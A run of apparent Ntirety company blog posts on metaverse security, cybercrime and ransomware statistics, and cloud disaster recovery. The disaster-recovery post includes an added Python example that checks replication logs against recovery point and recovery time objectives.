Very few people like overreach and overregulation by governments. To avoid having regulators come down on the web3 community like a ton of bricks, we must build security considerations into the metaverse from day one. While we must preserve the user experience within the metaverse, we need to simultaneously protect individuals and businesses while also growing usage. It’s a complex balance, and the time to get started on this is now. Consider the fact that the metaverse will be filled with massive troves of data, exchangeable at light speed, and much of it highly sensitive. Some of it will involve young adults, and even children, as those will likely be early adopters. We must expect that these data will be a target of opportunistic technological and social hacks. The impact on data privacy cannot be underestimated, and significant focus must be placed on the tools we have to protect privacy. In non-chronological order, we must:

- Define rights in the metaverse
- Create and enforce data accountability and data protection responsibilities
- Create a rating mechanism for age-appropriate access and use
- Protect against malware
- Provide awareness of cyber threats
- Sustain audit capabilities
- Reinforce identity and validation standards

There is enough depth of subject there to write a book (if not several) on these topics. However, the subject of identity is the most intriguing, so let us dive in.

Identity and Blockchain Security

We must consider how people will be able to identify themselves in the metaverse. 
We must consider how individuals will come to trust and know that the person or business they are interacting with is really who they say they are. Currently, the strongest anticipated solution will rely on blockchain-based mechanisms to verify identity. While there are obvious opportunities associated with blockchain implementation, it is notable that vulnerabilities are a possibility. Various non-fungible token (NFT) scams have already been noted, and the decentralized nature of the blockchain brings considerable concern that criminally gained assets such as tokens, identities, and transactions will not be recoverable in the absence of authoritative controls. Efforts to implement biometric identification, such as fingerprints or facial recognition, will also be required. Whatever the ultimate composition of these solutions, they all need to be secure and reliable.

A New World of Attacks

Before long, metaverse attackers and bots can and will come from anywhere, and they will do so around the clock. Naturally, metaverse networks will have to be secure, but we must enforce security by building continuous awareness into these networks. Along with strong passwords, multi-factor authentication, advanced firewalls, and advanced threat detection technologies, we will need to implement visibility and analysis throughout the fabric of the metaverse to detect anomalies, uncover activities, and maintain experiences for all. Data will have to be encrypted and password-protected whether it is in transit or at rest. We will also need to keep watch for phishing, malicious URLs, and similar types of online attacks. Some of these attacks will probably not have a definition yet because they don’t exist yet. In addition to the gallery of hacking, malware, ransomware, and phishing tricks of the trade, entirely new tactics will emerge to focus on the bleeding edge of NFTs, exchanges, and cryptocurrencies. 
We will need a way to report and distribute information about how these attacks came to pass.

Making a Better Metaverse

What we all love about the internet is the ability to get information, make exchanges, and speak freely. What we need from the internet is the assurance that it is all as secure as possible and age appropriate, and that we maintain privacy. As the metaverse arrives and evolves, it will require a balanced approach to ensure the best experience for all. The metaverse must capture holistic, principle-focused protections, including awareness, technological methods, and behavior modeling. The metaverse is part of our collective future, but it needs to incorporate what we have learned in the past twenty years so as not to make the same mistakes. The foundational cybersecurity challenges ahead of us are clear, and we must act on them right now to allow the metaverse to prosper. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.
Cybersecurity Challenges in a Nutshell

Computer security researcher Dan Farmer once said, “If security were all that mattered, computers would never be turned on, let alone hooked into a network with literally millions of potential intruders.” This is not reality, because as individuals and businesses we rely on these devices. The mindset must be changed about where cybersecurity falls on a business priority list. Cyber incidents most often occur because a cybersecurity plan was not set in place prior to an incident. Cybercriminals around the world are deploying ransomware in our cyber infrastructures after hours or over the weekend, so that by the time its effects are seen, the damage is done, whether the entry point was a phishing email or another form of exploitation. It is critical to be proactive when it comes to cybersecurity and to already have defenses in place before bad actors reach your cyber infrastructure. Cybercrime has (unfortunately) cost companies trillions of dollars a year, according to Cybersecurity Ventures:

- $6 Trillion USD a year
- $500 Billion a month
- $115.4 Billion a week
- $16.4 Billion a day
- $684.9 Million an hour
- $11.4 Million a minute

Most recently, ransomware groups and criminal enterprises from Russia have been able to operate in their country with no chance of going to jail because it fits with the desires of the country’s leadership. If this leniency on cybercrime remains in countries like this, we cannot rest, knowing our cyber infrastructures are not safe. Small to medium businesses are at high risk for ransomware attacks and often cannot fully recover afterwards. 71% of cyberattacks happen to businesses that have fewer than 500 employees. Implementing Zero Trust and having visibility into attacks, along with the resiliency to mitigate the damage, is critical in moving forward for any business. Frequent patching is another key operational strategy for defending against attacks; a prime example of insufficient patching is the recent log4j incident. 
Without proper patching, organizations remain vulnerable to external entities. Additionally, phishing is one of the top ways that cybercriminals enter IT infrastructures, and without proper training, employees and their organizations are vulnerable. Phishing accounts for 90% of data breaches. Through these phishing campaigns, bad actors can steal passwords, install malware to access or control the system, or deploy ransomware to immediately shut down the business. Weak or stolen passwords make up 81% of breaches, according to the Data Breach Investigations Report. This is why it is important to create strong passwords and change them often, along with implementing two-factor authentication. Vice President and Global Chief Information Security Officer Stéphane Nappo of Groupe SEB said, “The five most efficient cyber defenders are: Anticipation, Education, Detection, Reaction and Resilience. Do remember: ‘Cybersecurity is much more than an IT topic.’” For more details on how to secure your cyber infrastructure, watch our most recent webinar and schedule an assessment with us today.
The Changing Cyber Landscape

Cyber-attacks from suspected Russian bad actors have increased by over 800% since the start of the Russia-Ukraine war. Attacks have become far more frequent and unprecedented, and their impacts even more devastating. The Colonial Pipeline ransomware attack in 2021 is a recent example and is the largest publicly disclosed attack against critical infrastructure in the United States. The Colonial Pipeline is the largest refined oil product pipeline in the U.S. and can carry 3 million barrels of fuel per day between Texas and New York. Attackers exploited an exposed password for a VPN account, stole data, and asked for a ransom of $4.4M. The attack was felt across the country through shortages of jet fuel, and fear of a gas shortage caused panic-buying and a spike in gas prices. Global threats are dominating not only mainstream media headlines but, unfortunately, our cyber infrastructures as well. 2022 has already seen its fair share of challenges between Covid-19, supply chain issues, natural disasters, and the Russia-Ukraine war. Amidst all these events, cyber incidents were still the top global threat, according to the Allianz Risk Barometer 2022. Ransomware attacks cost companies millions each year. The top 5 known ransom payments include:

- CWT Global: amount paid $4.5 million; ransomware: Ragnar Locker
- Colonial Pipeline: amount paid $4.4 million; ransomware: DarkSide
- Brenntag: amount paid $4.4 million; ransomware: DarkSide
- Travelex: amount paid $2.3 million; ransomware: Sodinokibi
- University of California San Francisco (UCSF): amount paid $1.14 million; ransomware: NetWalker

Most of these victims were breached because of weak passwords or because they had few defenses in place and relied on firewalls alone. Most of these incidents could have been prevented through a proactive cybersecurity solution such as Identity and Access Management Services. 
Cyber criminals will often pose as co-workers, friends, or family members to obtain network or password credentials or for financial gain; this is called social engineering. The sense of urgency from an authority figure or family member often overrides our ability to recognize that this is an out-of-character request. It often leads to instantly sending money to what seems like a familiar face. The network or password credentials shared provide an entry point that your typical security hardware and software won’t notice, and allow unfettered access to valuable, critical data.

Existential Threats

As the attacks increase, so do the costs associated with them. The average cost of a data breach is $4.24 million for companies worldwide, according to the 2021 Cost of a Data Breach Report. With all the hackers and scammers flooding our cyber infrastructures today, it is more crucial than ever to have the proper defenses in place. The toll on business productivity and financial standing is far too much.

- Existential Threat: Ransomware. Real World Impact: The average cost of a ransomware attack is $732,520 when the ransom is not paid, but doubles to $1,448,458 if the ransom is paid
- Existential Threat: Downtime. Real World Impact: Amazon, Microsoft, Delta, Sony, Nvidia—no company is immune from downtime and the brand damage it inflicts
- Existential Threat: Compliance Fines. Real World Impact: New state compliance requirements are rolling out and the penalties are no slap on the wrist—California Consumer Privacy Act (CCPA) fines can run up to $7,500 per violation with no cap
- Existential Threat: Data Loss. Real World Impact: Whether from a cyberattack or human error, 40%-60% of SMBs won’t reopen after data loss

In addition to these existential threats, enterprises have faced a slew of IT challenges:

- The average enterprise has 6 different forms of application infrastructure, each of which comes with unique management systems and tools
- 80% of time is spent managing risk, which leaves little time for IT to create additional value for the business
- Compliance requirements are evolving in real time, including the addition of state privacy laws. California led the way with CCPA, and 38 other states recently implemented privacy laws
- IT is expected to do more with less year after year, managing cross-platforms and the security and compliance of different environments

With the ever-increasing threat landscape affecting more businesses and individuals each year, it is understandable that companies are seeking out a reliable partner to protect their cyber infrastructure. Ntirety can help your business build a security and compliance solution that meets today’s needs while strengthening your long-term strategy. For more information watch our recent webinar here and stay tuned for the next blog in this series.
When SHTF: Dissecting How Cloud Plays A Role In Disaster Recovery

When things go south, we often think of what we could have done to better prepare for the scenario. While many situations are out of our control, there are ways we can be proactive in mitigating cyber threats. This article from Ntirety CEO Emil Sayegh was originally published in Forbes.

When SHTF: Dissecting How Cloud Plays A Role In Disaster Recovery

SHTF – It’s a messy mental image, but for those of you who know these scenarios, it fits the chaos of dystopian moments such as what happened at the Port of Beirut in 2020, during the Texas Snovid Arctic Front in 2021, or more recently when Russia attacked Ukraine. However, the more you know about how to mitigate these sorts of massive disasters, the better prepared and at ease you will be. If disaster preparedness sounds like something that applies to your business (it does), consider identifying where your company is on the spectrum of data use (static vs. dynamic) and whether or not your IT and technology departments have identified the borders between responsibility and liability. Once this information is collected, you can begin to think about what happens when “it” hits the fan, so you’re ready if it does.

Slow and Costly

In the world of IT, traditional disaster recovery is well established in its redundancies and recovery times. It also includes a variety of concepts and practices that are simply out of step with today’s dynamic data environments. These approaches often came with limitations on flexibility and scalability. There is also the matter of investment: in order to take advantage of these benefits, there is a high initial investment in hardware and configuration, which can be costly for businesses, especially if they’re located across multiple sites. Companies that use traditional disaster recovery host servers at either local or remote locations that require maintenance, licensing, and parallel monitoring. 
The task of preserving valuable business resources is exponentially more difficult, time consuming, and costly than with more modern solutions – especially when it is not unheard of for failover to take hours or even days under conditions where local services are lost.

Enter Cloud Technologies

With the advent of cloud technologies, cloud disaster recovery has changed everything by eliminating the need for traditional infrastructure for data recovery purposes. This has significantly reduced downtime in IT departments that use this service, as they are able to harness the power of the cloud for immediate spin-up or failover after an incident occurs. At its most basic level, disaster recovery in cloud computing is performed by replicating data from a primary site to a cloud service. In case of a disaster, the data can be failed over to a different environment and resources with minimal downtime. Many cloud computing services are provided on a pay-as-you-go basis and can be accessed from anywhere at any time. Other cloud resources can be reserved through longer commitments to help reduce costs. Perhaps the most important feature of cloud backup and disaster recovery systems is that these environments can be programmatically automated, requiring minimal input. With the right configuration in place, cloud-based disaster recovery will be able to restore your entire environment in just minutes or less. Cloud-based disaster recovery provides a powerful way for businesses of all sizes, whether they’re large corporations or startups without the resources on hand themselves, to protect against outage risks while continuing normal operations during emergencies. With the right approach, organizations can satisfy their recovery point objective (RPO) and recovery time objective (RTO) needs with cloud data recovery. 
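The replicate-then-failover model described above is only as good as the gap between successful replicas (which bounds the RPO) and the time the failover actually takes (the RTO), so a recovery plan needs a check that measures both rather than assuming the schedule. The following added example (not from the original article and not Ntirety’s code) evaluates a constructed replication job log and a failover drill against an RPO and an RTO in Python; the log format, job names, timestamps and objective values are assumptions made for the illustration.

```python
from datetime import datetime, timedelta

# Constructed sample of a replication job log (hypothetical format, not any
# vendor's real output). One line per scheduled run from the primary site to
# the cloud target. A failed run does not produce a recoverable copy.
REPLICATION_LOG = """\
2022-03-01T00:00:00Z replicate site=primary target=cloud status=ok
2022-03-01T00:15:00Z replicate site=primary target=cloud status=ok
2022-03-01T00:30:00Z replicate site=primary target=cloud status=failed
2022-03-01T00:45:00Z replicate site=primary target=cloud status=ok
2022-03-01T01:00:00Z replicate site=primary target=cloud status=ok
"""


def parse_timestamp(stamp):
    """Parse the log's UTC timestamps (format assumed for this example)."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")


def parse_replication_log(text):
    """Return (timestamp, status) tuples in log order, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, _, rest = line.partition(" ")
        fields = dict(field.split("=", 1) for field in rest.split()[1:])
        events.append((parse_timestamp(stamp), fields["status"]))
    return events


def successful_replicas(events):
    """Timestamps of runs that actually produced a recoverable copy."""
    return [t for t, status in events if status == "ok"]


def worst_case_rpo(events):
    """Largest gap between consecutive successful replications: the most data
    that could have been lost had the primary failed just before the next
    success. Failed runs widen the gap around them."""
    ok = successful_replicas(events)
    if len(ok) < 2:
        raise ValueError("need at least two successful replications")
    return max(later - earlier for earlier, later in zip(ok, ok[1:]))


def data_loss_window(events, disaster_time):
    """Data lost if the primary fails at disaster_time: everything written
    since the last replica that completed before the failure."""
    before = [t for t in successful_replicas(events) if t <= disaster_time]
    if not before:
        raise ValueError("no successful replica exists before the disaster")
    return disaster_time - before[-1]


def evaluate_drill(events, disaster_time, failover_done, rpo_minutes, rto_minutes):
    """Score a failover drill against the stated objectives. RPO is taken from
    the replication log; RTO from when the failover environment was serving
    again. The RPO is only met if the worst observed gap also fits."""
    rpo_objective = timedelta(minutes=rpo_minutes)
    rto_objective = timedelta(minutes=rto_minutes)
    rpo_actual = data_loss_window(events, disaster_time)
    rpo_worst = worst_case_rpo(events)
    rto_actual = failover_done - disaster_time
    return {
        "rpo_actual": rpo_actual,
        "rpo_worst_case": rpo_worst,
        "rto_actual": rto_actual,
        "rpo_met": rpo_actual <= rpo_objective and rpo_worst <= rpo_objective,
        "rto_met": rto_actual <= rto_objective,
    }


if __name__ == "__main__":
    events = parse_replication_log(REPLICATION_LOG)
    # Drill (constructed): primary declared lost at 00:40, cloud copy serving
    # traffic at 00:52, measured against a 20-minute RPO and a 15-minute RTO.
    result = evaluate_drill(
        events,
        parse_timestamp("2022-03-01T00:40:00Z"),
        parse_timestamp("2022-03-01T00:52:00Z"),
        rpo_minutes=20,
        rto_minutes=15,
    )
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run as written, the drill meets the 15-minute RTO but misses the 20-minute RPO: the jobs are scheduled every 15 minutes, yet the one failed run stretched the gap between usable copies to 30 minutes. That silent shortfall is exactly what an automated check of this kind should surface before a real event, which is why the evaluation reads the job log rather than trusting the schedule.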
It is important for organizations to evaluate each potential offering for factors such as reliability and recurring costs before committing any long-term investment to this area of business continuity planning.

Prepping for Disasters

The lesson for C-levels is that disaster recovery, backup systems, and business continuity planning can no longer be regarded as luxuries in today’s uncertain environment. Our duty as IT professionals is to build the redundancy and disaster recovery needed to recover from such events. Redundancy is a critical IT principle, but when components begin to fail in sequence, returning to operation is an equally critical business priority. The IT community must put value into routine risk assessments. Technology departments and the executives who drive organizations cannot wait to react until something goes wrong. Risk assessment and the corresponding actions are top priorities that cannot be left to lower-level IT executives or staff. From beginning to end, CEOs, the entire C-suite, and the board must keep complete visibility and priority. The hyper-scale availability of cloud services in disaster recovery is one of the greatest innovations available to business today. Advanced computing and networking power is both simpler and more powerful than ever before, and exponentially scalable when needed during emergencies and “SHTF” scenarios. Many companies will not need anything but this one service: continuous remote deployment capabilities, backed up seamlessly through off-site storage facilities. With the power of a cloud that is everywhere when needed, a disaster mess becomes much simpler and faster to navigate. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.